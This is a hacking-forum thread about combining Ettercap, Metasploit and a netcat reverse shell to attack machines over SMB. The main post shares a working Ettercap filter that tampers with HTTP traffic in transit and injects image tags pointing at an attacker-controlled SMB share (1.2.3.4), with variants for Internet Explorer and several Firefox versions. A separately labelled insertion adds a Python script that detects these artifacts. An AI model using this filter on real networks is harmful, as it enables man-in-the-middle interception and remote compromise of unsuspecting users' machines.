Thread: Ettercap/Metasploit and netcat for backdoor

  1. #1
    Just burned his ISO overide's Avatar
    Join Date
    Nov 2007
    Posts
    21

    Ettercap/Metasploit and netcat for backdoor

    Exploiting SMB using Metasploit, Ettercap filters, via HTTP, and used netcat as a backdoor. I used a reverse shell connection to bypass firewalls and/or port forwarding.

    I know there are numerous tutorials and videos on it, but I thought I'd throw in my 2 cents. Plus I used some different tools, like genlist, and netcat.

    http://overide.blip.tv/file/1316077/

    -----------------
    Credits:
    -----------------
    Thanks to tutorials by
    pureh@te
    operat0r
    and others who I forgot.

  2. #2
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Nice video, and nice wallpaper. Thanks for sharing!
    Would you like to share your SMB.FILTER also??

    Does it work on Firefox??
    Don't eat yellow snow :rolleyes:

  3. #3
    Just burned his ISO overide's Avatar
    Join Date
    Nov 2007
    Posts
    21

    Originally posted by hawaii67:
    Nice video, and nice wallpaper. Thanks for sharing!
    Would you like to share your SMB.FILTER also??

    Does it work on Firefox??


    Here is the SMB.filter

    Yeah, if you look at the SMB.filter you'll see that there is a filter for Firefox 2* below, and 2* above.



    ------------------------------------------------

    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Rubbish!");
            # note: replacement string is same length as original string
            msg("zapped Accept-Encoding!\n");
        }
    }


    #####################
    # Internet Explorer #
    #####################

    if (ip.proto == TCP && tcp.src == 80) {
        replace("</body>", "<img src=\"\\\\1.2.3.4\\image.jpg\"></body>");
        replace("</Body>", "<IMG SRC=\"\\\\1.2.3.4\\image.jpg\"></body>");
        msg("Filter Ran.\n");
    }

    ############################
    # Firefox prior to 2.0.0.4 #
    ############################

    if (ip.proto == TCP && tcp.src == 80) {
        replace("</body>", "<img src=\"moz-icon:file:////1.2.3.4/share/hello.jpg\"></body>");
        replace("</Body>", "<img src=\"moz-icon:file:////1.2.3.4/share/hello.jpg\"></body>");
        msg("Filter Ran.\n");
    }

    ###################
    # Firefox 2.0.0.4 #
    ###################

    if (ip.proto == TCP && tcp.src == 80) {
        replace("</body>", "<img src=\"moz-icon:file:///%5c/1.2.3.4/share/hello.jpg\"></body>");
        replace("</Body>", "<img src=\"moz-icon:file:///%5c/1.2.3.4/share/hello.jpg\"></body>");
        msg("Filter Ran.\n");
    }


    -------------------------------------
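
Added example, not part of the original posts: a detection-side check for the two artifacts the filter above leaves in HTTP traffic, the renamed `Accept-Encoding` request header and an `<img>` whose `src` is a UNC path or a `moz-icon:file:` URL. The function names and the sample traffic are constructed for illustration.

```python
import re

# Constructed samples (192.0.2.10 is a documentation address, not from the thread).
TAMPERED_REQUEST = ("GET / HTTP/1.1\r\nHost: example.test\r\n"
                    "Accept-Rubbish!: gzip, deflate\r\n\r\n")
UNC_BODY = '<html><body><p>hi</p><img src="\\\\192.0.2.10\\image.jpg"></body></html>'
MOZ_BODY = '<body><IMG SRC="moz-icon:file:///%5c/192.0.2.10/share/hello.jpg"></body>'
CLEAN_BODY = '<body><img src="/logo.png"><img src="//cdn.example.test/a.png"></body>'

IMG_SRC = re.compile(r'<img\s[^>]*?src\s*=\s*["\']?([^"\'\s>]+)', re.I)
UNC = re.compile(r'^\\\\[^\\/]+\\')           # \\host\share...
MOZ_ICON = re.compile(r'^moz-icon:file:', re.I)


def check_request(raw: str) -> list[str]:
    """Flag the renamed Accept-Encoding header as seen at the origin server."""
    names = [line.split(":", 1)[0].strip().lower()
             for line in raw.split("\r\n")[1:] if ":" in line]
    if "accept-rubbish!" in names and "accept-encoding" not in names:
        return ["request: Accept-Encoding was rewritten in transit"]
    return []


def check_body(html: str) -> list[str]:
    """Flag <img> tags whose src makes the browser open a file/SMB path."""
    findings = []
    for match in IMG_SRC.finditer(html):
        src = match.group(1)
        if UNC.match(src):
            findings.append(f"response: img src is a UNC path: {src}")
        elif MOZ_ICON.match(src):
            findings.append(f"response: img src is a moz-icon file URL: {src}")
    return findings


if __name__ == "__main__":
    for sample in (UNC_BODY, MOZ_BODY, CLEAN_BODY):
        print(check_body(sample))
    print(check_request(TAMPERED_REQUEST))
```

Protocol-relative URLs such as `//cdn.example.test/a.png` are deliberately not flagged, since only the backslash UNC form and the `moz-icon:file:` scheme match what the filter injects.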

  4. #4
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Thanks, I'll give it a try with firefox.

    Don't eat yellow snow :rolleyes:
